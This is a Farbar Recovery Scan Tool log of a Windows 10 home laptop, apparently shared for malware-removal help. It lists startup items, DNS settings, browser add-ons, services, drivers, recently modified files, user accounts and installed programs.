ShellIconOverlayIdentifiers: [ CustomFolderNotSynced] -> {4008A679-BE48-456D-A32E-97DE3F48E10D} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ CustomFolderSynced] -> {4DD1429E-055B-4585-9E4D-614252FD7FC1} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FileNotSynced] -> {267973DC-2B3C-41CE-93F1-D2C5CCC06663} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FileSynced] -> {DBD42211-56CD-4C08-A3E4-48ED07AD7759} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderExcluded] -> {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderNotSynced] -> {3E2576B1-5B08-47DE-8803-95C6ECA734EE} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderSynced] -> {2858A960-566F-45CF-951E-4B3099E70E6F} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ CustomFolderNotSynced] -> {4008A679-BE48-456D-A32E-97DE3F48E10D} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ CustomFolderSynced] -> {4DD1429E-055B-4585-9E4D-614252FD7FC1} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FileNotSynced] -> {267973DC-2B3C-41CE-93F1-D2C5CCC06663} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FileSynced] -> {DBD42211-56CD-4C08-A3E4-48ED07AD7759} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FolderExcluded] -> {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FolderNotSynced] -> {3E2576B1-5B08-47DE-8803-95C6ECA734EE} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FolderSynced] -> {2858A960-566F-45CF-951E-4B3099E70E6F} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Event Reminder.lnk [2015-12-11]
ShortcutTarget: Event Reminder.lnk -> C:\Program Files (x86)\Broderbund\PrintMaster\pmremind.exe (Broderbund Properties LLC)
Startup: C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutorunsDisabled [2016-02-02] ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 127.0.0.1 localhost
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{21464931-263a-4a60-930e-a79b690b399f}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{31ea90e4-35d4-4540-a94c-eab28ac7c7e0}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{3973625b-d550-4482-8626-055c851fa7f8}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{3e5366e2-e619-4c7e-a254-4148181480bb}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{797fc918-2a02-4a5f-9f81-cc4932956ea0}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{825E0274-4ABB-4A35-83B7-62488622A3B1}: [NameServer] 8.8.8.8 8.8.4.4
Tcpip\..\Interfaces\{a1c95c13-acd4-4e93-88c9-2912fbc94e6c}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{c1fd1c83-dc19-4fbd-a13f-ebdcb53d58b0}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{ed4e3568-60c7-4154-bc8c-83374c0e6f1c}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131312655671564010&GUID=F34706C8-BC86-441C-8A8D-ECA6761F344B
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131312655672036951&GUID=F34706C8-BC86-441C-8A8D-ECA6761F344B
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131312655672053665&GUID=F34706C8-BC86-441C-8A8D-ECA6761F344B
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
BHO: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files\AMD\SteadyVideo\SteadyVideo.dll [2011-06-08] (Advanced Micro Devices)
BHO-x32: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files (x86)\amd\SteadyVideo\SteadyVideo.dll [2011-06-08] (Advanced Micro Devices)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-01-19] (Atheros Commnucations)
Toolbar: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)

FireFox:
========
FF ProfilePath: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default [2017-02-11]
FF NewTab: Mozilla\Firefox\Profiles\w1n6vmjf.default -> about:newtab
FF Extension: (No Name) - C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\videoresumer@jetpack [not found]
FF Extension: (No Name) - C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1} [not found]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\aolsearch.xml [2015-12-15]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2011-11-07] (Adobe Systems, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-02-10] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-02-10] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-12-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2783097096-289569773-1546617986-1001: bluejeans.com/bjninstallplugin -> C:\Users\Randy\AppData\Roaming\Blue Jeans\bjnplugin\2.115.57.5\npbjninstallplugin_2.115.57.5.dll [2015-10-15] (Blue Jeans)
FF Plugin HKU\S-1-5-21-2783097096-289569773-1546617986-1001: bluejeans.com/bjnplugin -> C:\Users\Randy\AppData\Roaming\Blue Jeans\bjnplugin\2.115.57.5\npbjnplugin_2.115.57.5.dll [2015-10-15] (Blue Jeans)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-12-17] (Adobe Systems Inc.)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\prefs.js [2015-12-11] <==== ATTENTION (Points to *.cfg file)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default [2017-02-11]
CHR Extension: (Google Docs) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-30]
CHR Extension: (Google Drive) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-30]
CHR Extension: (YouTube) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-30]
CHR Extension: (Google Search) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-30]
CHR Extension: (Google Docs Offline) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-08-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-02-11]
CHR Extension: (Gmail) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-30]
CHR Extension: (Chrome Media Router) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-11]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-02-10] (Advanced Micro Devices, Inc.) [File not signed]
R2 BackupService; C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe [247808 2016-05-06] (SpeedyPC Software) [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [253960 2016-04-27] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-29] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2016-06-30] (Microsoft Corporation)
R2 ZAtheros Bt&Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [158880 2012-01-19] (Atheros) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [102912 2015-05-28] (Advanced Micro Devices)
S3 lehidmini; C:\WINDOWS\system32\drivers\leath_hid.sys [36128 2012-01-19] (Atheros) [File not signed]
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [136408 2015-12-11] (Malwarebytes Corporation)
R3 RSP2STOR; C:\WINDOWS\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [589824 2015-10-29] (Realtek )
S3 ssmirrdr; C:\WINDOWS\system32\DRIVERS\ssmirrdr.sys [10112 2015-06-29] (support.com, Inc)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44568 2015-10-29] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [293216 2015-10-29] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [118112 2015-10-29] (Microsoft Corporation)
R3 WirelessKeyboardFilter; C:\WINDOWS\System32\drivers\WirelessKeyboardFilter.sys [49896 2016-07-22] (Microsoft Corporation)
U3 idsvc; no ImagePath
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-02-11 18:24 - 2017-02-11 18:24 - 00003986 _____ C:\Users\Randy\Desktop\JRT.txt
2017-02-11 15:05 - 2017-02-11 15:05 - 00003272 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-02-10 21:46 - 2017-02-10 21:46 - 00001291 _____ C:\Users\Randy\Desktop\Google Chrome.lnk
2017-02-10 21:27 - 2017-02-11 20:20 - 00000000 ____D C:\Users\Randy\Desktop\Virus
2017-02-10 21:27 - 2017-02-10 21:27 - 00000000 ____D C:\Users\Randy\Desktop\New folder

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-02-11 20:20 - 2016-08-08 22:41 - 00000512 _____ C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job
2017-02-11 20:20 - 2014-09-12 16:11 - 00000000 ____D C:\FRST
2017-02-11 19:36 - 2015-10-29 23:24 - 00000000 ___HD C:\Program Files\WindowsApps
2017-02-11 19:36 - 2015-10-29 23:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-02-11 19:31 - 2012-03-01 11:01 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2017-02-11 19:28 - 2016-02-02 10:45 - 00000000 ____D C:\Users\Randy\AppData\Local\Packages
2017-02-11 19:04 - 2016-08-08 00:10 - 00000000 ____D C:\$Windows.~BT
2017-02-11 18:43 - 2016-02-02 10:03 - 00000000 ___DC C:\WINDOWS\Panther
2017-02-11 18:43 - 2013-07-23 22:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-02-11 18:34 - 2015-10-29 23:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-02-11 18:34 - 2013-02-01 21:26 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-02-11 18:21 - 2016-02-17 15:50 - 00000000 ____D C:\Program Files\COMODO
2017-02-11 18:15 - 2016-08-08 22:41 - 00000496 _____ C:\WINDOWS\Tasks\SpeedyBackup Startup.job
2017-02-11 18:13 - 2016-08-08 22:41 - 00000530 _____ C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job
2017-02-11 18:13 - 2016-08-08 22:41 - 00000522 _____ C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job
2017-02-11 18:13 - 2016-02-02 10:38 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-02-11 18:12 - 2016-02-02 10:30 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2017-02-11 18:12 - 2015-10-29 22:28 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2017-02-11 18:11 - 2014-09-12 16:43 - 00000000 ____D C:\AdwCleaner
2017-02-11 18:10 - 2013-03-20 21:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-02-11 18:08 - 2014-02-09 06:52 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-02-11 18:08 - 2013-03-20 21:54 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2017-02-11 18:08 - 2013-03-20 21:54 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2017-02-11 18:07 - 2015-12-04 10:59 - 00000000 ____D C:\Program Files (x86)\iolo
2017-02-11 18:03 - 2015-10-29 23:24 - 00000000 ____D C:\WINDOWS\system32\SecureBootUpdates
2017-02-11 15:13 - 2016-02-02 10:18 - 00000000 ____D C:\Users\Randy
2017-02-11 15:08 - 2016-02-02 10:17 - 01010686 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-02-11 15:08 - 2015-10-29 23:21 - 00000000 ____D C:\WINDOWS\INF
2017-02-11 15:05 - 2016-02-02 10:56 - 00002399 _____ C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-02-11 15:05 - 2016-02-02 10:56 - 00000000 ___RD C:\Users\Randy\OneDrive
2017-02-11 15:03 - 2012-11-20 13:45 - 00000000 ____D C:\Users\Randy\AppData\Roaming\Skype
2017-02-11 14:58 - 2016-02-15 14:41 - 00000000 ____D C:\Users\Randy\AppData\Local\{3A700C2C-1ED8-6094-7340-457C5728B9E4}
2017-02-10 21:59 - 2013-01-03 20:57 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-02-10 21:36 - 2013-01-03 20:56 - 00003416 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-02-10 21:36 - 2013-01-03 20:56 - 00003292 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-02-10 21:24 - 2013-02-24 22:05 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2017-02-10 21:19 - 2015-10-29 23:24 - 00000000 ____D C:\WINDOWS\system32\NDF

==================== Files in the root of some directories =======

2016-08-08 20:54 - 2017-02-10 21:18 - 0000115 _____ () C:\Users\Randy\AppData\Roaming\LogFile.txt
2016-06-19 06:26 - 2016-06-19 06:26 - 2049556 _____ () C:\Users\Randy\AppData\Roaming\sb0.dat
2016-06-10 06:41 - 2016-06-10 06:41 - 2049556 _____ () C:\Users\Randy\AppData\Roaming\sb203.dat
2016-02-17 11:41 - 2016-08-05 17:41 - 0000228 _____ () C:\Users\Randy\AppData\Roaming\WB.CFG
2015-11-15 15:05 - 2015-11-15 15:05 - 0002560 _____ () C:\Users\Randy\AppData\Local\uninstall.exe
2015-01-27 15:51 - 2015-01-27 15:51 - 0000057 _____ () C:\ProgramData\Ament.ini

Some files in TEMP:
====================
2016-08-08 22:40 - 2016-08-08 22:41 - 8464000 _____ (SpeedyPC Software Inc.) C:\Users\Randy\AppData\Local\Temp\OMD5938.tmp.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-02-10 22:01

==================== End of FRST.txt ============================

 

[glhglh]

Addition:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-02-2017
Ran by Randy (11-02-2017 20:21:27)
Running from C:\Users\Randy\Desktop\Virus
Windows 10 Home Version 1511 (X64) (2016-02-02 18:44:56)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2783097096-289569773-1546617986-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2783097096-289569773-1546617986-503 - Limited - Disabled)
Guest (S-1-5-21-2783097096-289569773-1546617986-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2783097096-289569773-1546617986-1011 - Limited - Enabled)
Randy (S-1-5-21-2783097096-289569773-1546617986-1001 - Administrator - Enabled) => C:\Users\Randy

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Reader XI (11.0.19) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.19 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.3.633 - Adobe Systems, Inc.)
AMD Catalyst Install Manager (HKLM\...\{9D1400EC-5703-3983-53B7-AEFB8BFD1CFA}) (Version: 3.0.864.0 - Advanced Micro Devices, Inc.)
AOL Uninstaller (Choose which Products to Remove) (HKLM-x32\...\AOL Uninstaller) (Version: - AOL Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.120 - Atheros)
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 9.2 - Atheros)
Blio (HKLM-x32\...\{74A8E1BE-D438-4C35-ABFF-3A1EAF17526E}) (Version: 2.2.8530 - K-NFB Reading Technology, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DHTML Editing Component (HKLM-x32\...\{2EA870FA-585F-4187-903D-CB9FFD21E2E0}) (Version: 6.02.0001 - Microsoft Corporation)
Driver Detective (HKLM-x32\...\DriversHQ.DriverDetective.Client) (Version: 10.1.2.44 - PC Drivers HeadQuarters LP)
Ear Training 101 - Full Version (HKLM-x32\...\Ear Training 101 - Full Version4.0) (Version: - )
Ear Training 101 & Rhythmic Patterns (HKLM-x32\...\Ear Training 101 & Rhythmic Patternsv. 4.0) (Version: v. 4.0 - Music Unlimited Inc.)
ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{768A6276-5822-489C-8A2B-67190F745655}) (Version: 4.1.2 - Hewlett-Packard)
Evernote v. 4.5.2 (HKLM-x32\...\{8CE152BA-1D16-11E1-867D-984BE15F174E}) (Version: 4.5.2.5904 - Evernote Corp.)
FileASSASSIN (HKLM-x32\...\FileASSASSIN) (Version: 1.06 - Malwarebytes)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.1.2.0 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
HP 3D DriveGuard (HKLM\...\{B1A6285F-C31A-4482-8EA0-9445E4C1DCEA}) (Version: 4.1.10.1 - Hewlett-Packard Company)
HP Application Assistant (HKLM\...\{6032497A-4479-462B-ADB8-A0A372BB9A23}) (Version: 1.0.409.3882 - Hewlett-Packard)
HP Connection Manager (HKLM-x32\...\{B65FCAA5-F3A6-4B3F-ABEE-CBC2B085796B}) (Version: 4.1.25.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{16B7BDA1-B967-4D2D-8B27-E12727C28350}) (Version: 2.10.3 - Hewlett-Packard Company)
HP Deskjet 1510 series Basic Device Software (HKLM\...\{D17E60E8-478A-4D4A-8147-21D481B5CA55}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
HP Deskjet 1510 series Help (HKLM-x32\...\{2E25FCEB-EFCB-4696-AA01-D3CBAC721831}) (Version: 30.0.0 - Hewlett Packard)
HP Documentation (HKLM-x32\...\{16652164-D80F-4EE6-90C6-2E8D5D06092A}) (Version: 1.1.0.0 - Hewlett-Packard)
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP OfficeJet 3830 series Basic Device Software (HKLM\...\{644380A4-11D0-48CB-AAB8-CCB6BD072784}) (Version: 36.0.72.54013 - Hewlett-Packard Co.)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Quick Launch (HKLM-x32\...\{C61FCEC2-3ED4-496E-B4B4-1CED423824B9}) (Version: 2.6.2 - Hewlett-Packard Company)
HP Security Assistant (HKLM\...\{F9DF0B5D-554B-45D2-8698-7C467FAF4BCA}) (Version: 2.0.2 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1}) (Version: 9.0.15109.3899 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.2.14901.3869 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{6DE80866-EF92-47C1-80F5-1EA83B7A0AA2}) (Version: 4.5.4.1 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6381.0 - IDT)
iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
